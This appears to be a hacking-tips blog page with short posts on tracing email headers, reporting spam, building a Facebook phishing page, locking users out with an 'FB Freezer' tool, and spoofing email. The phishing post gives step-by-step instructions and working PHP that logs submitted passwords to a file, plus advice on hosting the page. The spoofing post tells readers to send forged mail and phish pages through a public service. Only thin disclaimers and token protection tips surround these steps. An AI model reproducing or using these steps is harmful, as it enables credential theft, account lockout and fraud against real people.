Tracing emails - Protect yourself from fake mailers!!

How to find from where did a mail come? Is it really by the sender mentioned on the mail client or is it a fake mail?
I will be mentioning how to trace these mails to the IP Address of the original sender.

Gmail Users
1. Open the mail you want to trace.
2. Click on "view original"
3. Here, search for the phrase "received: from". You will find many of them in the code. Actually, it is the list of all the IP addresses of the servers from which your mail travelled to finally reach you.
4. Now search for the last "received: from" from the code. This is the one showing the name and the IP Address of the computer from where the mail originated.

Now as you have the IP Address, you can locate the computer with the help of Geobytes IP Locator or any other online IP locating sevice

Read More

Phishing: How hackers do it and how to protect yourself

Disclaimer: This Article is for educational purposes only. Don't misuse it and the author does not take the responsibility of the damage caused by you.

My readers ask me how to hack Facebook accounts. Most of the people curious to know how hackers take control of their accounts. In this post, let me clarify those doubts.

Here, I am going to explain one of the popular social engineering attack(luring user into do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how hackers create a facebook phishing page.
Step 1:
To make a fake page of the target website , hackers simply use the source code of the website and save it as html page. In most cases , it is facebook. They go to facebook and right click on the website . Select "View source" and copy the code to notepad.

Step2:
Now search (Press ctrl +f) for keyword "action" in that code.
Here, let me explain what "action" means to. If you have some basic knowledge of web applications, then you already know about that. 'Action' is a HTML attribute that specifies where to send the form-data when a form(In our case, login-form) is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php). So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, hackers have to change the action value to their php file. So they change the value to ' action="login.php" '. Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

Step 3:
Now , they create a login.php file that will capture the entered data and redirects to original facebook page.

They open the notepad and type the following code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

They open the notepad and just save the file as "pswrds.txt" (without any contents).

Step 5:
To host their phishing page, they need a webhosting. They create a free account in free web hosting providers. Once they have created account in free hosting site, they can host their files and run. Also, their files can be viewed by visiting a specific URL provided when they create an account. For example : 'your_url_name.webhosting_domain.com'.

Now they upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. They make sure the fake page is working or not by vising your url.

Now , they have to lure people into login into their phishing page. Once you login into the page, they can see your login credentials being stored in the "pswrds.txt" file.

Protection is rather simple, but the need is to stay alert,
1. As always, do not open any untrusted mail/ attachment.
2. Check the URL of the site you are on and ensure it is "https".
3. Do not enter any personal information on pop-ups and/or on untrusted sites.
4. etc.... etc.....

These were the major steps, that you can follow.

Credits: +Tasneem Wasim, +Rajat Jain 

Read More

FB Freezer: How hackers freeze accounts AND the solution

Disclaimer: This Article is for educational purposes only. Don't misuse it and the author does not take the responsibility of the damage caused by you.

Hackers don't use this tool to hack accounts but to freeze the user's access to their accounts. They use a
facebook rule that states 'after 25 or so logins the user accounts get locked temporarily' to their advantage.

1. They download FBfreezer from hackershome.in/My%20Files/facebook%20freezer.rar
2. Enter the email ID of the victim.
3. And simply click on freeze.
That's it and you are trapped.

How to remain protected from this threat:

Relatively simple, always be logged on to facebook via your mobile, no one can freeze your ID then!!

Read More

What to do about Spams and spoofed mails

Many, or almost 75%, of the email users don't know what to fo if a spam or a spoofed mail arrives on your ID. Here is what to so. Always report "phishing" or “spoofed” e-mails to the following groups:

1. Forward the email to reportphishing@antiphishing.org .

2. Forward the email to the Federal Trade Commission at spam@uce.gov.

3. Forward the email to the "abuse" email address at the company that is being spoofed (e.g. "spoof@ebay.com").

4. When forwarding spoofed messages, always include the entire original email with its original header information intact.

5. Notify The Internet Crime Complaint Center of the FBI by filing a complaint on their website: www.ic3.gov.

Read More

Email Spoofing

Email spoofing refers to sending a mail to a person from someone else's account without even opening it. For this you can go to a ready made website, emkei.cz, or make your own email spoofing site. I recommend that you go to emkei.cz as it will spare you your effort.

On the page you will see the following:
From Name: Name of the person who is sending the mail
From email: Email of the person sending the mail
To: Victim's email
Subject: As in normal mails
Attachments: You know what to do here
Content Type: text/plain if you want to send normal message or text/HTML if you want to send phish pages

Enter the CAPTCHA and hit SEND and your work will be done.

Read More